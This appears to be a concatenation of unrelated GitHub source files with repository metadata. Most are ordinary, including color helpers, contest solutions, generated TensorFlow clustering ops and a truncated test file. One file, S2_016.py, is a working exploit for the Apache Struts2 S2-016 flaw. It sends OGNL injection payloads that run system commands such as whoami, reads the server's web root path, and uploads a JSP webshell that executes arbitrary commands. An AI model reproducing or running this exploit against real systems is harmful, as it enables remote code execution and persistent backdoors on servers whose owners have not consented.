|
class termcolor:
def __init__(self):
self.color_switch = True
def on(self):
self.color_switch = True
def off(self):
self.color_switch = False
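    # The helpers below wrap the text in an ANSI escape sequence:
    # ESC[<color>;2m ... ESC[0m (dim foreground color, then reset).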
def black(self,s): return self.__color(30, s)
def red(self,s): return self.__color(31, s)
def green(self,s): return self.__color(32, s)
def yellow(self,s): return self.__color(33, s)
def blue(self,s): return self.__color(34, s)
def purple(self,s): return self.__color(35, s)
def white(self,s): return self.__color(37, s)
def __color(self, color_int, s):
if self.color_switch:
return "%s[%d;2m%s%s[0m" %(chr(27), color_int, s, chr(27))
else:
return s
def highlight(self,s):
if self.color_switch:
return "%s[30;2m%s%s[1m"%(chr(27), s, chr(27))
else:
return s
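# Module-level variants of the same helpers, always colored (no on/off switch).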
def __color(color_int, s):
return "%s[%d;2m%s%s[0m" %(chr(27), color_int, s, chr(27))
def black(s): return __color(30, s)
def red(s): return __color(31, s)
def green(s): return __color(32, s)
def yellow(s): return __color(33, s)
def blue(s): return __color(34, s)
def purple(s): return __color(35, s)
def white(s): return __color(37, s)
|
[
"[email protected]"
] | |
1cd7062e2dbbc857e50079a192f844d5b55ed6a5
|
350ecc8259bcad075bd376423335bb41cc8a533e
|
/container.py
|
d6f4dabc91f6cd2c71ee5bbf7a890d63b568db65
|
[] |
no_license
|
CodedQuen/python_begin
|
39da66ecc4a77b94a5afbbf0900727c8156b85e1
|
1433c319b5d85520c50aee00dd4b6f21a7e6366a
|
refs/heads/master
| 2022-06-10T10:30:28.807874 | 2020-04-25T03:34:03 | 2020-04-25T03:34:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 276 |
py
|
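# Note: `Object` and `abstractmethod` are assumed to be provided elsewhere
# (e.g. the course's own support module); this snippet carries no imports of its own.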
class Container(Object):
def __init__(self):
super(Container, self).__init__()
self._count = 0
def purge(self):
pass
purge = abstractmethod(purge)
def __iter__(self):
pass
__iter__ = abstractmethod(__iter__)
|
[
"[email protected]"
] | |
96324744aa7dddbf82ee6d0e7ad929195f6382f3
|
3db5e39d9bbe1c86229a26e7d19e3ceb37f902e3
|
/Baekjoon/DFS/11403_경로찾기.py
|
428e02133b0c4846feee49fd309f8023c6f0c0a1
|
[] |
no_license
|
sweetrain096/rain-s_python
|
5ca2fe5e7f97a681b6e75e64264687a723be1976
|
eb285eb50eeebfaa2b4a4d7816314e2073faab00
|
refs/heads/master
| 2021-07-19T16:06:01.389283 | 2020-05-29T14:56:16 | 2020-05-29T14:56:16 | 162,240,216 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 442 |
py
|
import sys
sys.stdin = open("11403_input.txt")
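# DFS from every start row. `cnt` skips marking the start node on the very first call,
# so row i is reported as reachable from itself only if some path leads back to it.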
def dfs(node):
global cnt
if cnt:
visited[node] = 1
cnt += 1
for i in range(n):
if graph[node][i] and not visited[i]:
dfs(i)
n = int(input())
graph = []
for i in range(n):
graph.append(list(map(int, input().split())))
for row in range(n):
visited = [0 for _ in range(n)]
cnt = 0
dfs(row)
    print(' '.join(map(str, visited)))
|
[
"[email protected]"
] | |
aafa2d25bda177feee0ba3861452ed094d4d6d30
|
80760d4c8a6b2c45b4b529bdd98d33c9c5509438
|
/Practice/atcoder/ABC/055/src/c.py
|
581f1048d011740a10f93f59ac009b0225db5863
|
[] |
no_license
|
prrn-pg/Shojin
|
f1f46f8df932df0be90082b475ec02b52ddd882e
|
3a20f1122d8bf7d95d9ecd205a62fc36168953d2
|
refs/heads/master
| 2022-12-30T22:26:41.020473 | 2020-10-17T13:53:52 | 2020-10-17T13:53:52 | 93,830,182 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 254 |
py
|
# It is best to use the existing 'S' pieces as much as possible (making an 'S' out of 'c' pieces costs extra)
# "as many as possible" = m // 2
# Making one "Scc" from the leftover 'c' pieces alone takes 4 of them
n, m = map(int, input().split())
c = min(n, m // 2)
c += max(0, (m-2*n) // 4)
print(c)
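# Worked example (added for illustration): n=1, m=6 -> min(1, 3) = 1 "Scc" from the single
# S plus two c, and (6 - 2) // 4 = 1 more built entirely from the remaining four c, so 2.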
|
[
"[email protected]"
] | |
7373d5b736b485909f5bd2f9492763ddb0046a15
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_connivance.py
|
4c54eff01815f5dbf6ca736af9a0c9732235da69
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 393 |
py
|
# class header
class _CONNIVANCE():
def __init__(self,):
self.name = "CONNIVANCE"
self.definitions = [u'the act of conniving, especially by knowing that something bad is happening and allowing it to continue: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"[email protected]"
] | |
c9781bbdb2daf299479b46c56664e6961bb2de0e
|
a3d72c9d47a3711ff1a7213da25bacdcb3a7aa32
|
/stickerfinder/models/__init__.py
|
060f44f521a3886e9ed3f2fb27f318cbfea89f87
|
[
"MIT"
] |
permissive
|
crashcoredump/sticker-finder
|
225a46c586d1b2b8764cf325e296186cbece5edd
|
8158724ebc3e8346012d0ede05a75bb8f9f5f7eb
|
refs/heads/master
| 2020-08-26T23:28:56.991893 | 2019-10-23T22:34:58 | 2019-10-23T22:34:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 788 |
py
|
from stickerfinder.models.chat import Chat, chat_sticker_set # noqa
from stickerfinder.models.sticker import Sticker, sticker_tag # noqa
from stickerfinder.models.task import Task # noqa
from stickerfinder.models.sticker_set import StickerSet # noqa
from stickerfinder.models.tag import Tag # noqa
from stickerfinder.models.user import User # noqa
from stickerfinder.models.change import Change, change_added_tags, change_removed_tags # noqa
from stickerfinder.models.report import Report # noqa
from stickerfinder.models.inline_query import InlineQuery # noqa
from stickerfinder.models.inline_query_request import InlineQueryRequest # noqa
from stickerfinder.models.sticker_usages import StickerUsage # noqa
from stickerfinder.models.proposed_tags import ProposedTags # noqa
|
[
"[email protected]"
] | |
db0ceb7dc61955a38e418bdd38b7e2bbb30d7b57
|
c3b66b2f374722acda9747e8c0759ec7aed7e367
|
/flask/app/plugins/Struts2/S2_016.py
|
788428d7ee3f5c29ee61681f8c4b92562e011671
|
[] |
no_license
|
LubyRuffy/linbing
|
743965f6e658e476da011ae3a91a91c8466ff977
|
b9fb2358955f19629b96ae753cd8811e8d89a862
|
refs/heads/master
| 2021-02-19T18:24:32.890527 | 2020-03-04T06:18:46 | 2020-03-04T06:18:46 | 245,317,758 | 1 | 0 | null | 2020-03-06T03:02:42 | 2020-03-06T03:02:41 | null |
UTF-8
|
Python
| false | false | 6,166 |
py
|
#!/usr/bin/env python3
'''
name: Struts2 S2-016 vulnerability, also known as CVE-2013-2251
description: The Struts2 S2-016 vulnerability allows arbitrary command execution
'''
import os
import re
import json
import time
import urllib
import string
import random
import requests
from urllib import request, parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class S2_016_BaseVerify:
def __init__(self, url):
self.url = url
self.capta=''
words=''.join((string.ascii_letters,string.digits))
for i in range(8):
self.capta = self.capta + random.choice(words)
self.headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3",
'Content-Type': "application/x-www-form-urlencoded",
'Connection': "keep-alive",
}
self.check_payload = '''?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27''' + 'echo' + ' ' + self.capta + '''%27%29.getInputStream%28%29%29%7D'''
self.cmd_payload = '''?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{'whoami'}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}'''
self.path_payload = '''?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28"%2F"%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'''
self.jsp_payload = """
<%
if("cmd".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
"""
def get_pagecode(self, url):
req = requests.get(url = url, verify = False)
return req
def upload_jspshell(self, url, path):
webshellpath = "'" + path + '/' + "/test.jsp" + "'"
Headers = {'ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent' : 'Mozilla/5.0 (compatible; Indy Library)'}
payload = "?redirect:${%23path%3d"
payload += webshellpath
payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println("
payload += '"' + path + '/test.jsp' + '+Get Shell!!!"'
payload += "),%23stm.getWriter().flush(),%23stm.getWriter().close()}"
url += payload
try:
req = requests.post(url, data = self.jsp_payload, headers = Headers, timeout = 10, allow_redirects = False, verify = False)
if req.text.find('<html') == -1:
print('上传webshell文件成功,webshell文件路径为:', self.url.split('/')[0] + '//' + self.url.split('/')[2] + '/test.jsp')
else:
return 'Fail.....>_<'
except Exception as e:
return str(e)
def filter(self, check_str):
temp = ''
for i in check_str:
if i != '\n' and i != '\x00':
temp = temp + i
return temp
def run(self):
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
if '.action' not in self.url:
self.url = self.url + '/index.action'
check_req = self.get_pagecode(self.url + self.check_payload)
check_str = self.filter(list(check_req.text))
try:
if self.capta in check_str:
cmd_req = self.get_pagecode(self.url + self.cmd_payload)
cmd_str = self.filter(list(cmd_req.text))
print('存在S2-016漏洞,执行whoami命令成功,执行结果为:', cmd_str)
path_req = self.get_pagecode(self.url + self.path_payload)
if path_req.status_code == 200:
print('存在S2-016漏洞,获取网站文件路径成功,结果为:', path_req.text)
self.upload_jspshell(self.url, "".join(path_req.text.split()))
return True
else:
print('不存在S2-016漏洞!')
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
s2_016 = S2_016_BaseVerify('http://192.168.30.242:8080')
s2_016.run()
|
[
"[email protected]"
] | |
2e55ea81485a99cd8a994f57353debe1ccb6c9d8
|
dd65b9bc9475a6cc58817fd45c078e5a6abae241
|
/Tensorflow/car/web-tf2/gcf-packs/tensorflow2.0/source/tensorflow/python/ops/gen_clustering_ops.py
|
c6eae8834fad9b885a2742b697d32016a0d07dd6
|
[] |
no_license
|
jumbokh/gcp_class
|
5b68192ab4ad091362d89ad667c64443b3b095bb
|
0a8e2663bfb5b01ce20146da178fa0c9bd7c6625
|
refs/heads/master
| 2021-10-22T09:22:04.634899 | 2021-10-21T12:46:10 | 2021-10-21T12:46:10 | 228,617,096 | 8 | 7 | null | 2021-08-25T15:55:30 | 2019-12-17T12:58:17 |
Python
|
UTF-8
|
Python
| false | false | 13,575 |
py
|
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: clustering_ops.cc
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.tf_export import kwarg_only as _kwarg_only
from tensorflow.tools.docs import doc_controls as _doc_controls
def kmc2_chain_initialization(distances, seed, name=None):
r"""Returns the index of a data point that should be added to the seed set.
Entries in distances are assumed to be squared distances of candidate points to
the already sampled centers in the seed set. The op constructs one Markov chain
of the k-MC^2 algorithm and returns the index of one candidate point to be added
as an additional cluster center.
Args:
distances: A `Tensor` of type `float32`.
Vector with squared distances to the closest previously sampled cluster center
for each candidate point.
seed: A `Tensor` of type `int64`.
Scalar. Seed for initializing the random number generator.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int64`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"KMC2ChainInitialization", name, _ctx._post_execution_callbacks,
distances, seed)
return _result
except _core._FallbackException:
try:
return kmc2_chain_initialization_eager_fallback(
distances, seed, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"KMC2ChainInitialization", distances=distances, seed=seed, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"KMC2ChainInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
@_doc_controls.do_not_generate_docs
@_kwarg_only
def KMC2ChainInitialization(distances, seed):
return kmc2_chain_initialization(distances=distances, seed=seed)
tf_export("raw_ops.KMC2ChainInitialization")(KMC2ChainInitialization)
def kmc2_chain_initialization_eager_fallback(distances, seed, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function kmc2_chain_initialization
"""
_ctx = ctx if ctx else _context.context()
distances = _ops.convert_to_tensor(distances, _dtypes.float32)
seed = _ops.convert_to_tensor(seed, _dtypes.int64)
_inputs_flat = [distances, seed]
_attrs = None
_result = _execute.execute(b"KMC2ChainInitialization", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"KMC2ChainInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def kmeans_plus_plus_initialization(points, num_to_sample, seed, num_retries_per_sample, name=None):
r"""Selects num_to_sample rows of input using the KMeans++ criterion.
Rows of points are assumed to be input points. One row is selected at random.
Subsequent rows are sampled with probability proportional to the squared L2
distance from the nearest row selected thus far till num_to_sample rows have
been sampled.
Args:
points: A `Tensor` of type `float32`.
Matrix of shape (n, d). Rows are assumed to be input points.
num_to_sample: A `Tensor` of type `int64`.
Scalar. The number of rows to sample. This value must not be larger than n.
seed: A `Tensor` of type `int64`.
Scalar. Seed for initializing the random number generator.
num_retries_per_sample: A `Tensor` of type `int64`.
Scalar. For each row that is sampled, this parameter
specifies the number of additional points to draw from the current
distribution before selecting the best. If a negative value is specified, a
heuristic is used to sample O(log(num_to_sample)) additional points.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"KmeansPlusPlusInitialization", name, _ctx._post_execution_callbacks,
points, num_to_sample, seed, num_retries_per_sample)
return _result
except _core._FallbackException:
try:
return kmeans_plus_plus_initialization_eager_fallback(
points, num_to_sample, seed, num_retries_per_sample, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"KmeansPlusPlusInitialization", points=points,
num_to_sample=num_to_sample,
seed=seed,
num_retries_per_sample=num_retries_per_sample,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"KmeansPlusPlusInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
@_doc_controls.do_not_generate_docs
@_kwarg_only
def KmeansPlusPlusInitialization(points, num_to_sample, seed, num_retries_per_sample):
return kmeans_plus_plus_initialization(points=points, num_to_sample=num_to_sample, seed=seed, num_retries_per_sample=num_retries_per_sample)
tf_export("raw_ops.KmeansPlusPlusInitialization")(KmeansPlusPlusInitialization)
def kmeans_plus_plus_initialization_eager_fallback(points, num_to_sample, seed, num_retries_per_sample, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function kmeans_plus_plus_initialization
"""
_ctx = ctx if ctx else _context.context()
points = _ops.convert_to_tensor(points, _dtypes.float32)
num_to_sample = _ops.convert_to_tensor(num_to_sample, _dtypes.int64)
seed = _ops.convert_to_tensor(seed, _dtypes.int64)
num_retries_per_sample = _ops.convert_to_tensor(num_retries_per_sample, _dtypes.int64)
_inputs_flat = [points, num_to_sample, seed, num_retries_per_sample]
_attrs = None
_result = _execute.execute(b"KmeansPlusPlusInitialization", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"KmeansPlusPlusInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_nearest_neighbors_outputs = ["nearest_center_indices",
"nearest_center_distances"]
_NearestNeighborsOutput = _collections.namedtuple(
"NearestNeighbors", _nearest_neighbors_outputs)
def nearest_neighbors(points, centers, k, name=None):
r"""Selects the k nearest centers for each point.
Rows of points are assumed to be input points. Rows of centers are assumed to be
the list of candidate centers. For each point, the k centers that have least L2
distance to it are computed.
Args:
points: A `Tensor` of type `float32`.
Matrix of shape (n, d). Rows are assumed to be input points.
centers: A `Tensor` of type `float32`.
Matrix of shape (m, d). Rows are assumed to be centers.
k: A `Tensor` of type `int64`.
Number of nearest centers to return for each point. If k is larger than m, then
only m centers are returned.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (nearest_center_indices, nearest_center_distances).
nearest_center_indices: A `Tensor` of type `int64`.
nearest_center_distances: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"NearestNeighbors", name, _ctx._post_execution_callbacks, points,
centers, k)
_result = _NearestNeighborsOutput._make(_result)
return _result
except _core._FallbackException:
try:
return nearest_neighbors_eager_fallback(
points, centers, k, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"NearestNeighbors", points=points, centers=centers, k=k, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"NearestNeighbors", _inputs_flat, _attrs, _result, name)
_result = _NearestNeighborsOutput._make(_result)
return _result
@_doc_controls.do_not_generate_docs
@_kwarg_only
def NearestNeighbors(points, centers, k):
return nearest_neighbors(points=points, centers=centers, k=k)
tf_export("raw_ops.NearestNeighbors")(NearestNeighbors)
def nearest_neighbors_eager_fallback(points, centers, k, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function nearest_neighbors
"""
_ctx = ctx if ctx else _context.context()
points = _ops.convert_to_tensor(points, _dtypes.float32)
centers = _ops.convert_to_tensor(centers, _dtypes.float32)
k = _ops.convert_to_tensor(k, _dtypes.int64)
_inputs_flat = [points, centers, k]
_attrs = None
_result = _execute.execute(b"NearestNeighbors", 2, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"NearestNeighbors", _inputs_flat, _attrs, _result, name)
_result = _NearestNeighborsOutput._make(_result)
return _result
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "KMC2ChainInitialization"
# input_arg {
# name: "distances"
# type: DT_FLOAT
# }
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# output_arg {
# name: "index"
# type: DT_INT64
# }
# }
# op {
# name: "KmeansPlusPlusInitialization"
# input_arg {
# name: "points"
# type: DT_FLOAT
# }
# input_arg {
# name: "num_to_sample"
# type: DT_INT64
# }
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# input_arg {
# name: "num_retries_per_sample"
# type: DT_INT64
# }
# output_arg {
# name: "samples"
# type: DT_FLOAT
# }
# }
# op {
# name: "NearestNeighbors"
# input_arg {
# name: "points"
# type: DT_FLOAT
# }
# input_arg {
# name: "centers"
# type: DT_FLOAT
# }
# input_arg {
# name: "k"
# type: DT_INT64
# }
# output_arg {
# name: "nearest_center_indices"
# type: DT_INT64
# }
# output_arg {
# name: "nearest_center_distances"
# type: DT_FLOAT
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n=\n\027KMC2ChainInitialization\022\r\n\tdistances\030\001\022\010\n\004seed\030\t\032\t\n\005index\030\t\np\n\034KmeansPlusPlusInitialization\022\n\n\006points\030\001\022\021\n\rnum_to_sample\030\t\022\010\n\004seed\030\t\022\032\n\026num_retries_per_sample\030\t\032\013\n\007samples\030\001\nl\n\020NearestNeighbors\022\n\n\006points\030\001\022\013\n\007centers\030\001\022\005\n\001k\030\t\032\032\n\026nearest_center_indices\030\t\032\034\n\030nearest_center_distances\030\001")
|
[
"[email protected]"
] | |
6b2320e8c2c47715ea5c98b27735c8f33d211d9e
|
369e260e100db9ab5cc8b1711e99ef5e49aec173
|
/ml/m04_xor4_keras.py
|
87fe064f010eff90ddc713569ba5716aa45af154
|
[] |
no_license
|
HWALIMLEE/study
|
7aa4c22cb9d7f7838634d984df96eed75f7aefea
|
8336adc8999126258fe328d6b985a48e32667852
|
refs/heads/master
| 2023-03-26T09:11:19.606085 | 2021-03-29T23:03:04 | 2021-03-29T23:03:04 | 259,555,730 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,983 |
py
|
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor
from keras.layers import Dense
from keras.models import Sequential
import numpy as np
# In classic machine learning you can feed the data in as-is,
# but for deep learning convert it to np.array.
# Deep learning is a sum of weighted products,
# so arrays are needed to do matrix multiplication / matrix operations properly.
# A list only gets appended to --> no actual arithmetic is performed on it.
# Machine learning is not weight arithmetic, so a plain list works there too.
#labelencoder
# 1. Data
x_data=[[0,0],[1,0],[0,1],[1,1]]
y_data=[0,1,1,0]
x_data=np.array(x_data)
print(x_data)
y_data=np.array(y_data)
print("x_data.shape",x_data.shape) #(4,2)
print("y_data.shape:",y_data.shape) #(4,)
# 2. Model
# model=LinearSVC()
# model=SVC()
# lin = LinearSVC()
# sv = SVC()
# kn = KNeighborsClassifier(n_neighbors=1)
model=Sequential()
# The smaller n_neighbors is, the tighter the fit
# With little data it is better to keep n_neighbors small
# Connect each sample to just one neighbor
model.add(Dense(10,input_dim=2,activation='relu')) # input and output  # not deep learning by itself
model.add(Dense(30,activation='relu'))
model.add(Dense(20,activation='relu'))
model.add(Dense(10,activation='relu'))
model.add(Dense(1,activation='sigmoid')) # sigmoid only on the last layer
#output dimension=1
# 3. Run
model.compile(optimizer='adam',metrics=['acc'],loss='binary_crossentropy') # metrics are for reporting only
model.fit(x_data,y_data,epochs=100,batch_size=1)
loss,acc=model.evaluate(x_data,y_data)
# accuracy can never reach 1 with a linear model -- XOR is not linearly separable
# 4. Evaluate / predict
x_test = [[0,0],[1,0],[0,1],[1,1]]
x_test=np.array(x_test)
y_predict = model.predict(x_test)
# acc=accuracy_score([0,1,1,0],y_predict)
# plain score is the same thing as evaluate
# score can be used instead of evaluate
# acc2=accuracy_score([0,1,1,0],y_predict)
print(x_test,"prediction results:",y_predict)
print("acc=",acc)
|
[
"[email protected]"
] | |
c3e30f6134e4652db4fcb9a756938a84de9592d2
|
3a85089c2498ff04d1b9bce17a4b8bf6cf2380c9
|
/TrackPropagation/SteppingHelixPropagator/python/__init__.py
|
e9c699776f8f1dbd5ebfdd70d185bf5b183ab392
|
[] |
no_license
|
sextonkennedy/cmssw-ib
|
c2e85b5ffa1269505597025e55db4ffee896a6c3
|
e04f4c26752e0775bd3cffd3a936b288ee7b0268
|
HEAD
| 2016-09-01T20:09:33.163593 | 2013-04-26T12:05:17 | 2013-04-29T16:40:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 232 |
py
|
#Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/TrackPropagation/SteppingHelixPropagator/',1)[0])+'/cfipython/slc6_amd64_gcc480/TrackPropagation/SteppingHelixPropagator')
|
[
"[email protected]"
] | |
ff0a7531475d07eb5161d4785ee3ed33b3de3b33
|
165e706d485e90f4e4f63cfb9f2c35acda14cfc0
|
/uq_benchmark_2019/imagenet/data_lib_test.py
|
b3ae4f7ae9236b62494d913b373efd1af733d1ab
|
[
"Apache-2.0"
] |
permissive
|
Tarkiyah/googleResearch
|
65581f3bbbe2ffe248c9e613c0ea7eac336d5372
|
dea327aa9e7ef7f7bca5a6c225dbdca1077a06e9
|
refs/heads/master
| 2022-12-07T12:04:44.153221 | 2019-11-21T16:03:48 | 2019-11-21T16:18:28 | 223,229,888 | 11 | 2 |
Apache-2.0
| 2022-11-21T21:39:10 | 2019-11-21T17:38:31 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 4,751 |
py
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for imagenet.data_lib."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import flags
from absl.testing import absltest
from absl.testing import parameterized
import tensorflow.compat.v2 as tf
from uq_benchmark_2019 import image_data_utils
from uq_benchmark_2019.imagenet import data_lib
flags.DEFINE_bool('fake_data', True, 'Bypass tests that rely on real data and '
'use dummy random data for the remaining tests.')
tf.enable_v2_behavior()
BATCH_SIZE = 8
BATCHED_IMAGES_SHAPE = (BATCH_SIZE,) + data_lib.IMAGENET_SHAPE
class DataLibTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters(['train', 'test', 'valid'])
def test_fake_data(self, split):
# config is ignored for fake data
config = image_data_utils.DataConfig(split)
dataset = data_lib.build_dataset(config, BATCH_SIZE, fake_data=True)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_uncorrupted_data(self, split):
config = image_data_utils.DataConfig(split)
if not flags.FLAGS.fake_data:
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_roll_pixels(self, split):
config = image_data_utils.DataConfig(split, roll_pixels=5)
if not flags.FLAGS.fake_data:
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
